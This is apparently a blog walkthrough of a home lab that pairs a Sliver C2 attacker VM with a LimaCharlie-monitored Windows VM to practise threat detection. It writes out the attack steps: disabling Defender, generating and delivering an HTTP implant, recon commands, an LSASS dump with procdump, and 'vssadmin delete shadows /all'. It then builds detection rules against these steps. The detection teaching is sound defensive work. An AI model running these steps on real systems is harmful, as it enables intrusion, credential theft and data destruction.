Home Lab Setup - Threat Detection With LimaCharlie EDR
In this post, I’ll walk you through my home lab setup, where I generate a C2 payload and analyze its behavior using LimaCharlie as my EDR solution. We’ll simulate a real-world attack scenario, monitor endpoint activity, and leverage threat-hunting techniques to detect and respond to malicious behavior.
For this setup, I’m using two VM machines -
- Attacker Machine – Ubuntu VM for launching attacks.
- Victim Machine – Windows VM monitored by EDR.
Setting up attacker machine
setting up a static IP address (optional)
change the interface from DHCPv4 to Manual.
Edit IPV4 method to manual
Get the required values from VMware virtual network editor. add ‘/24’ to the end of subnet IP.
Select install openssh server
Setting up victim machine
Disabling Windows Defefnder
I am using sorums defender control to disable windows defender or you can disable it manually
This will prevent vm from going to sleep mode
1
2
3
4
5
6
powercfg /change standby-timeout-ac 0
powercfg /change standby-timeout-dc 0
powercfg /change monitor-timeout-ac 0
powercfg /change monitor-timeout-dc 0
powercfg /change hibernate-timeout-ac 0
powercfg /change hibernate-timeout-dc 0
Installing Sysmon for Advanced Logging
1
2
Invoke-WebRequest -Uri https://download.sysinternals.com/files/Sysmon.zip -OutFile C:\Windows\Temp\Sysmon.zip
Expand-Archive -LiteralPath C:\Windows\Temp\Sysmon.zip -DestinationPath C:\Windows\Temp\Sysmon
Configuring Sysmon
We’ll use SwiftOnSecurity’s Sysmon configuration:
1
2
Invoke-WebRequest -Uri https://raw.githubusercontent.com/SwiftOnSecurity/sysmon-config/master/sysmonconfig-export.xml -OutFile C:\Windows\Temp\Sysmon\sysmonconfig.xml
C:\Windows\Temp\Sysmon\Sysmon64.exe -accepteula -i C:\Windows\Temp\Sysmon\sysmonconfig.xml
Verify Sysmon is Running
Install LimaCharlie EDR on Windows VM
Create Free LimaCharlie Account
- Sign up at LimaCharlie.io
- Create an Organization
- Add Sensor:
- Select Windows
- Choose x86-64 (.exe) sensor
- Open PowerShell in administrator mode and install the sensor application
1
2
cd C:\Users\User\Downloads
Invoke-WebRequest -Uri https://downloads.limacharlie.io/sensor/windows/64 -Outfile C:\Users\User\Downloads\lc_sensor.exe cmd.exe
- Copy the LimaCharlie installation command and run it in Command Prompt.
- When the sensor is successful installed it with show in the web UI.
Enable Sysmon Log Collection
- In LimaCharlie Web UI, go to Artifact Collection
- Click Add Rule → Enter:
- Name:
windows-sysmon-logs - Platform: Windows
- Path Pattern:
wel://Microsoft-Windows-Sysmon/Operational:* - Retention: 10 days
- Name:
- Click Save Rule
Process
1. Installing Sliver
SSH into Ubuntu VM
It is much easy if we use a ssh client to connect to the Ubuntu VM because it will give us more control over the shell.
1
ssh user@[Linux_VM_IP]
Install Sliver C2 Framework
This will install Sliver C2 framework .
1
2
3
4
5
sudo su
wget https://github.com/BishopFox/sliver/releases/download/v1.5.34/sliver-server_linux -O /usr/local/bin/sliver-server
chmod +x /usr/local/bin/sliver-server
apt install -y mingw-w64
mkdir -p /opt/sliver
2. Generating the C2 Payload
We will use Sliver C2 to generate the payload .
Accessing the Linux VM
Login into the linux shell and switch to the root user:
sudo suChange the directory to the Sliver installation directory:
cd /opt/sliverStart the Sliver C2 server:
sliver-server
Creating the Payload
Generate the C2 payload using the Ubuntu VM’s static IP address which we setuped at the beginning
generate --http [Linux_VM_IP] --save /opt/sliver
Verify the the implant which we created:
implantsExit Sliver for now:
exit
3. Transferring the Payload to the Windows VM
I am using a python http server to transfer the C2 payload from our linux machine to Windows VM .
Hosting the Payload on the Linux VM
Start a simple HTTP server on the Linux VM:
1 2
cd /opt/sliver python3 -m http.server 80
Downloading the Payload on the Windows VM
- Open an Administrative PowerShell Console on the Windows VM.
- Download the C2 payload from the Linux VM:
1
IWR -Uri http://[Linux_VM_IP]/[payload_name].exe -o Outfile C:\Users\User\Downloads\[payload_name].exe
1
2
- Replace `[Linux_VM_IP]` with the Linux VM’s IP address.
- Replace `[payload_name].exe` with the actual payload filename.
4. Establishing a C2 Session
Preparing the Listener on the Linux VM
Stop the Python web server and drop into the silver server:
Ctrl + Csliver-serverStart a HTTP listener:
http
Executing the Payload on the Windows VM
Execute the payload from an Administrative PowerShell console
C:\Users\User\Downloads\[payload_name].exe
Confirming the Connection on the Linux VM
If the payload successfully executed a session id will appear in our shell , Check if any session has been established:
sessionsConnect to the active session with the session id:
use [session_id]
Gathering System Information
Now that the C2 session is established, we will gather system information to simulate an attacker’s reconnaissance activities.
System Reconnaissance Commands
Get basic system details about the session:
info
Check user privileges:
whoamigetprivs
If you successfully executed the payload with the admin rights you will see some additional permissions
Find the current working directory:
pwd
List active network connections:
netstat
List running processes:
ps -T
1
- Sliver highlights its own process in **green** and detected security tools in **red**.
Observing our EDR Telemetry
1. Setting Up LimaCharlie for Telemetry Analysis
Before diving into telemetry, ensure your Windows VM sensor is active in LimaCharlie:
- Navigate to the LimaCharlie Web UI.
- Click “Sensors” on the left menu.
- Select your active Windows sensor to access real-time system data.
2. Process Monitoring in LimaCharlie
One of the key aspects of EDR is process monitoring. Attackers often use malicious or compromised processes to establish persistence and execute payloads.
Viewing Running Processes
- In the sensor menu, click “Processes” to open the process tree.
- Look for unsigned processes, which could indicate suspicious activity.
- Hover over icons to see additional details such as digital signatures, parent-child relationships, and process execution details.
Identifying Suspicious Processes
- Malicious implants often appear as unsigned processes.
- LimaCharlie highlights security-related processes in red and its own monitoring process in green.
- Compare process behaviors against known legitimate system processes using resources like EchoTrail or the SANS Hunt Evil poster.
3. Analyzing Network Activity
Checking Network Connections
- Navigate to the “Network” tab in the sensor menu.
- Use Ctrl+F to search for known Indicators of Compromise (IoCs), such as:
- The name of the C2 implant.
- The IP address of the C2 server.
- Look for unexpected outbound connections to unfamiliar IPs, especially those associated with non-standard ports.
Identifying Suspicious Network Behavior
- A new or unknown process communicating externally is a red flag.
- A process making frequent connections to an external IP might indicate beaconing behavior.
- Compare connection logs with threat intelligence feeds to determine if an external IP is associated with known threats.
4. Investigating File System Activity
Many attacks involve dropping, modifying, or executing malicious files. Monitoring the file system helps detect these changes.
Finding Suspicious Files
- Go to the “File System” tab in LimaCharlie.
- Navigate to directories where suspicious files were recently executed (e.g.,
C:\Users\User\Downloads). - Locate the C2 implant file or any unusual executables.
Verifying File Integrity with VirusTotal
- Use LimaCharlie’s “Scan with VirusTotal” feature.
- This checks the file’s hash against VirusTotal’s database to see if it’s flagged as malicious.
- If “Item not found”, it may be a new or custom-built malware sample—an indicator of targeted attacks.
5. Examining the Timeline for Event Correlation
The “Timeline” feature in LimaCharlie provides a real-time stream of security events and system activities.
Filtering and Searching for Threat Indicators
- Use filters to focus on events related to:
- New process executions.
- Network connections.
- File modifications.
- Identify when the C2 implant was created, executed, and connected to an external IP.
Tracking an Attack Sequence
- Look for a chain of events leading to execution (e.g., file creation → execution → privilege escalation).
- Identify related detections such as SENSITIVE_PROCESS_ACCESS, which logs attempts to dump LSASS memory for credential theft.
6. Practical Exercise: Detecting a Credential Dumping Attempt
Step 1: Dumping LSASS Memory (Adversarial Action)
In your C2 session (Sliver), run:
procdump -n lsass.exe -s lsass.dmp
This simulates an attacker attempting to extract credentials from memory.
Step 2: Searching for the Event in LimaCharlie
- In the Timeline, filter for SENSITIVE_PROCESS_ACCESS events.
- Locate the process accessing lsass.exe.
- This provides visibility into how attackers attempt credential theft.
Step 3: Creating a Detection Rule
To detect this in the future, create a Detection & Response (D&R) rule:
Replace the detect section with this
1
2
3
4
event: SENSITIVE_PROCESS_ACCESS
op: ends with
path: event/*/TARGET/FILE_PATH
value: lsass.exe`
and the respond section with this
1
2
- action: report
name: LSASS access
- This triggers an alert whenever LSASS memory is accessed.
- Go to the “Detections” tab to see real-time alerts for similar attacks.
You can the check the detection rule we built using the test event option before saving .
6. Practical Exercise: Detecting Volume Shadow Copy Deletion Attempt
One common tactic employed by ransomware is the deletion of Volume Shadow Copies to prevent system restoration.
Why Focus on Volume Shadow Copy Deletion?
Volume Shadow Copies allow users to restore files or entire systems to previous states. Ransomware often deletes these copies using commands like:
vssadmin delete shadows /all
This command is rarely used in regular operations, making it an excellent candidate for a blocking rule.
1. Implementing the Blocking Rule
To create an effective blocking rule, we first need to generate telemetry by executing the malicious command in a controlled environment.
- Access the Sliver C2 Session: Connect to your target session via the Sliver C2 framework.
Execute the Command:
shellWhen prompted with “This action is bad OPSEC, are you an adult?” type
Yand press Enter.vssadmin delete shadows /all
1
Note: The command's success is not essential; executing it will generate the necessary telemetry.
2. Detect the Activity Using LimaCharlie
- Access LimaCharlie: Navigate to the Detections tab to see if any default Sigma rules have flagged the activity.
- Examine the Detection: Expand the detection to view metadata and references, which provide insights into why this activity is suspicious.
3. Create a Detection & Response (D&R) Rule
- View the Event Timeline: In LimaCharlie, locate the raw event corresponding to the malicious activity.
Craft the D&R Rule:
- Detection Section: Configure the rule to detect the specific command execution.
- Response Section: Define actions to take upon detection, such as terminating the offending process.
Example response configuration:
1 2 3 4 5 6
- action: report name: vss_deletion_kill_it - action: task command: - deny_tree - <<routing/parent>>
In this configuration:
action: reportgenerates a detection report.action: taskwithdeny_treeterminates the parent process responsible for the command.
4. Test the Blocking Rule
- Re-execute the Malicious Command: Run the
vssadmin delete shadows /allcommand again in the Sliver C2 session. - Verify the Response: The command should trigger the D&R rule, resulting in the termination of the parent process. To confirm, attempt to run another command (e.g.,
whoami). If the session is terminated or unresponsive, the blocking rule is functioning correctly.
That’s all for now! Let’s meet again with another interesting lab soon.
